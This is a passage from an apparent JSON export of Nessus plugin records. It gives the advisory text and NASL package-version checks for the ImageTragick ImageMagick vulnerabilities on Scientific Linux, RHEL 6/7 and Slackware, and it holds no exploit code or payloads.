Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91039);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Scientific Linux Security Update : ImageMagick on SL6.x, SL7.x i386/x86_64 (20160509) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more 
security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - It was discovered that ImageMagick did not properly\n sanitize certain input before passing it to the delegate\n functionality. A remote attacker could create a\n specially crafted image that, when processed by an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities, would lead to arbitrary\n execution of shell commands with the privileges of the\n user running the application. (CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and\n pseudo-protocols did not properly prevent security\n sensitive operations when processing specially crafted\n images. A remote attacker could create a specially\n crafted image that, when processed by an application\n using ImageMagick or an unsuspecting user using the\n ImageMagick utilities, would allow the attacker to\n delete, move, or disclose the contents of arbitrary\n files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in the\n way ImageMagick processed certain images. A remote\n attacker could exploit this flaw to mislead an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities into, for example,\n performing HTTP(S) requests or opening FTP sessions via\n specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. 
Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1605&L=scientific-linux-errata&F=&S=&P=1966\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?46d0d048\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-debuginfo-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-debuginfo-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:41", "description": "An update for ImageMagick is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. 
A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : ImageMagick (RHSA-2016:0726) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:ImageMagick", "p-cpe:/a:redhat:enterprise_linux:imagemagick-c%5c%2b%5c%2b", "p-cpe:/a:redhat:enterprise_linux:imagemagick-c%5c%2b%5c%2b-devel", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-debuginfo", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-devel", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-doc", "p-cpe:/a:redhat:enterprise_linux:ImageMagick-perl", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91036", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The 
descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0726. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91036);\n script_version(\"2.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"RHEL 6 / 7 : ImageMagick (RHSA-2016:0726) (ImageTragick)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. 
A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. 
Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3718\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-c\\+\\+-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0726\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\n\n if 
(rpm_check(release:\"RHEL6\", reference:\"ImageMagick-debuginfo-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-debuginfo-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:49", "description": "New mozilla-thunderbird packages are available for Slackware 14.1 and\n-current to fix security issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-12T00:00:00", "type": "nessus", "title": "Slackware 14.0 / 14.1 / current : mozilla-thunderbird (SSA:2016-132-01) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:imagemagick", "p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2016-132-01.NASL", "href": "https://www.tenable.com/plugins/nessus/91046", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-132-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91046);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"SSA\", value:\"2016-132-01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / current : mozilla-thunderbird (SSA:2016-132-01) (ImageTragick)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mozilla-thunderbird packages are available for Slackware 14.1 and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.359500\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a01f0c3\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.440568\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27bd7c00\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick and / or mozilla-thunderbird packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"imagemagick\", pkgver:\"6.7.7_10\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.7.7_10\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"imagemagick\", pkgver:\"6.8.6_10\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.8.6_10\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"imagemagick\", pkgver:\"6.9.4_1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif 
